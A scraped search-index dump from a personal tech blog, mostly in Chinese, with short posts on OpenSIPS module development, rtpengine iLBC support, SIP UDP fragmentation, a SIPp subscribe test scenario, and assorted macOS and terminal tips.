xlog(\u0026#34;hello\u0026#34;); } 运行demo ./dev.sh build # 构建脚本 ./dev.sh start # 启动opensips 没有意外的话,opensips启动成功,可以看下log.txt的内容, 也可以通过netstat -nulp | grep opensips 查找opensips的进程\n➜ home_location git:(home_location) ✗ tail log.txt Apr 20 23:00:37 [748389] INFO:core:main: using 2 Mb of private process memory Apr 20 23:00:37 [748389] INFO:core:init_reactor_size: reactor size 1024 (using up to 0.03Mb of memory per process) Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_THRESHOLD(0)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_SHM_THRESHOLD(1)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_PKG_THRESHOLD(2)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing UDP-plain protocol Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing TCP-plain protocol Apr 20 23:00:37 [748389] INFO:home_location:mod_init: initializing... Apr 20 23:00:37 [748396] opensips startupApr 20 23:00:37 [748380] INFO:core:daemonize: pre-daemon process exiting with 0 Apr 21 05:32:32 [748410] WARNING:core:handle_timer_job: timer job \u0026lt;blcore-expire\u0026gt; has a 100000 us delay in execution ","permalink":"https://wdd.js.org/opensips/module-dev/l3/","summary":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.","title":"ch3 复制并裁剪一个模块"},{"content":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select. git revision: 9c2c8638e main.c compiled on 13:49:33 Apr 20 2021 with gcc 9 ","permalink":"https://wdd.js.org/opensips/module-dev/l2/","summary":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select.","title":"ch2 初始化环境"},{"content":"Intro Sonic is a fast, lightweight and schema-less search backend. It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","permalink":"https://wdd.js.org/posts/2021/04/kvg1r9/","summary":"Intro Sonic is a fast, lightweight and schema-less search backend. It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","title":"learn Sonic"},{"content":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必需要勾选。\n","permalink":"https://wdd.js.org/posts/2021/04/gt9iss/","summary":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必需要勾选。","title":"command + tab 无法切换窗口了?"},{"content":"ilbc的编码特定是占用带宽小,并且抗丢表。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库\nRUN echo \u0026#34;deb http://www.deb-multimedia.org stretch main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list \\ \u0026amp;\u0026amp; apt-get update \\ \u0026amp;\u0026amp; apt-get install deb-multimedia-keyring -y --allow-unauthenticated \\ \u0026amp;\u0026amp; apt-get install libilbc-dev libavcodec-dev libilbc2 -y --allow-unauthenticated 安装以来之后,继续构建rtpengine, rtpengine构建完之后,执行rtpengine --codecs\n","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-ilbc/","summary":"ilbc的编码特定是占用带宽小,并且抗丢表。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库","title":"rtpengine 增加对ilbc编解码的支持"},{"content":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会有。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!\n","permalink":"https://wdd.js.org/posts/2021/04/zf3xgd/","summary":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会有。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!","title":"draw.io居然有桌面客户端了"},{"content":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在再想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我想在觉得,人和动物的区别应该是,人会问自己: 我什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。\n","permalink":"https://wdd.js.org/posts/2021/04/qb6asq/","summary":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在再想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我想在觉得,人和动物的区别应该是,人会问自己: 我什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。","title":"人为什么活着"},{"content":" 现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致一下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片是对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the\none indicated in the top Via, the value in the top Via MUST be\nchanged. This prevents fragmentation of messages over UDP and\nprovides congestion control for larger messages. However,\nimplementations MUST be able to handle messages up to the maximum\ndatagram packet size. For UDP, this size is 65,535 bytes, including\nIP and UDP headers.\nThe 200 byte \u0026ldquo;buffer\u0026rdquo; between the message size and the MTU\naccommodates the fact that the response in SIP can be larger than\nthe request. This happens due to the addition of Record-Route\nheader field values to the responses to INVITE, for example. With\nthe extra buffer, the response can be about 170 bytes larger than\nthe request, and still not be fragmented on IPv4 (about 30 bytes is consumed by IP/UDP, assuming no IPSec). 1300 is chosen when\npath MTU is not known, based on the assumption of a 1500 byte\nEthernet MTU. RFC 3261 18.1.1\n但是使用TCP来传输也有缺点,就是比使用UDP更占用资源。\n如何发现问题 用tcpdump在路径中抓包,然后使用wireshark分析抓包文件的大小分布。\n如何减少包的尺寸 移除无用的SIP头或者无用的SDP信息, 以opensips脚本为例子 # 可以通过$ml来获取消息的长度 if ($ml \u0026gt; 1300) { xlog(\u0026#34;L_WARN\u0026#34;,\u0026#34;$ci $rm $si $fu: message big then 1300: $ml\u0026#34;); } if ($ml \u0026gt;= 1500) { xlog(\u0026#34;L_ERR\u0026#34;,\u0026#34;$ci $rm $si $fu: message to big than 1500 $ml\u0026#34;); sl_send_reply(\u0026#34;513\u0026#34;,\u0026#34;Message too big\u0026#34;); } # 可以通过remove_hf和codec_delete来移除多余的消息 if(is_present_hf(\u0026#34;User-Agent\u0026#34;)) { remove_hf(\u0026#34;User-Agent\u0026#34;); } if (codec_exists(\u0026#34;Speex\u0026#34;)) { codec_delete(\u0026#34;Speex\u0026#34;); } 使用SIP头压缩技术,opensips中也有头压缩的模块 注意不要在脚本中随意使用append_hf去给SIP消息增加头 参考 https://www.yay.com/faq/voip-network/udp-maximum-mtu-size/ https://www.ibm.com/support/pages/sending-large-sip-request-exceeds-mtu-value-might-not-switch-udp-tcp http://www.rfcreader.com/#rfc3261_line6474 https://www.ecg.co/blog/125-sip-and-fragments-together-forever https://en.wikipedia.org/wiki/IP_fragmentation https://thomas.gelf.net/blog/archives/Smaller-SIP-packets-to-avoid-fragmentation,27.html http://www.evaristesys.com/blog/sip-udp-fragmentation-and-kamailio-the-sip-header-diet/ ","permalink":"https://wdd.js.org/opensips/ch7/big-udp-msg/","summary":"现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致一下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片是对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the","title":"UDP分片导致SIP消息丢失"},{"content":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 贯标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! !!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang\n","permalink":"https://wdd.js.org/posts/2021/04/nqs50g/","summary":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 贯标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! !!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang","title":"sudo !!的妙用"},{"content":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;![CDATA[ SIP/2.0 200 OK [last_Via:] [last_From:] [last_To:] [last_Call-ID:] [last_CSeq:] Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;!-- \u0026lt;nop\u0026gt; \u0026lt;action\u0026gt; \u0026lt;exec int_cmd=\u0026#34;stop_now\u0026#34;/\u0026gt; \u0026lt;/action\u0026gt; \u0026lt;/nop\u0026gt; --\u0026gt; \u0026lt;!-- definition of the response time repartition table (unit is ms) --\u0026gt; \u0026lt;ResponseTimeRepartition value=\u0026#34;10, 20, 30, 40, 50, 100, 150, 200\u0026#34;/\u0026gt; \u0026lt;!-- definition of the call length repartition table (unit is ms) --\u0026gt; \u0026lt;CallLengthRepartition value=\u0026#34;10, 50, 100, 500, 1000, 5000, 10000\u0026#34;/\u0026gt; \u0026lt;/scenario\u0026gt; 定义配置文件 #!/bin/bash # conf.sh edge_address=\u0026#39;192.168.40.88:18627\u0026#39; my_ext=\u0026#39;8003\u0026#39; my_domain=\u0026#39;ss.cc\u0026#39; my_monitor=\u0026#39;8004\u0026#39; 定义状态码处理函数 用来处理来自sipp的返回的状态码\n#!/bin/bash # util.sh log_error () { case $1 in 0) echo INFO: test success ;; 1) echo ERROR: At least one call failed ;; 97) echo ERROR: Exit on internal command. Calls may have been processed ;; 99) echo ERROR: Normal exit without calls processed ;; -1) echo ERROR: Fatal error ;; -2) echo ERROR: Fatal error binding a socket ;; *) echo ERROR: Unknow exit code $0 ;; esac } 启动文件 -key 用来定义变量,在场景文件中存在三个变量 [my_ext] 当前分机号 [my_domain] 当前分机域名 [my_monitor] 当前分机想要监控的分机号 -recv_timeout 表示设置接受消息的超时时间为1000毫秒 -timeout 设置整个运行过程的超时时间 -sf 指定场景文件 -m 设置最大处理的呼叫数 -l 设置并发呼叫数量 -r 设置呼叫速度 #!/bin/bash # test.sh source ../util.sh source ./conf.sh rm *.log sipp -trace_logs $edge_address \\ -key my_ext $my_ext \\ -key my_domain $my_domain \\ -key my_monitor $my_monitor \\ -recv_timeout 1000 \\ -timeout 2 \\ -sf ./subscibe.xml -m 1 -l 1 -r 1; log_error $? 执行测试: chmod +x test.sh ./test.sh sngrep 抓包 ","permalink":"https://wdd.js.org/opensips/tools/sipp-subscriber/","summary":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;!","title":"subscribe场景测试"},{"content":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possile 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","permalink":"https://wdd.js.org/posts/2021/04/hh661g/","summary":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possile 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","title":"iterm2 光标消失了"},{"content":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎是backend没有设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不再tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.\nThe trick is to make sure that PATH is empty before path_helper runs. In my ~/.bash_profile file I have this:\nif [ -f /etc/profile ]; then PATH=\u0026quot;\u0026quot; source /etc/profile fi\n\u0026gt; Clearing PATH before path_helper executes will prevent it from prepending the default PATH to your (previously) chosen PATH, and will allow the rest of your personal bash setup scripts (commands further down `.bash_profile`, or in `.bashrc` if you\u0026#39;ve sourced it from `.bash_profile`) to setup your PATH accordingly. \u0026gt; ```bash if [ -f /etc/profile ]; then PATH=\u0026#34;\u0026#34; source /etc/profile fi cat /etc/profile # 我有这个文件 PATH=\u0026#34;\u0026#34; source /etc/profile 总是,按照sf上的操作,我的问题解决了,图片弹出了。\n参考 https://stackoverflow.com/questions/62423342/python-plot-in-tmux-session-not-showing https://blog.csdn.net/Meditator_hkx/article/details/59106752 https://superuser.com/questions/544989/does-tmux-sort-the-path-variable ","permalink":"https://wdd.js.org/posts/2021/03/pqreg4/","summary":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎是backend没有设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不再tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, 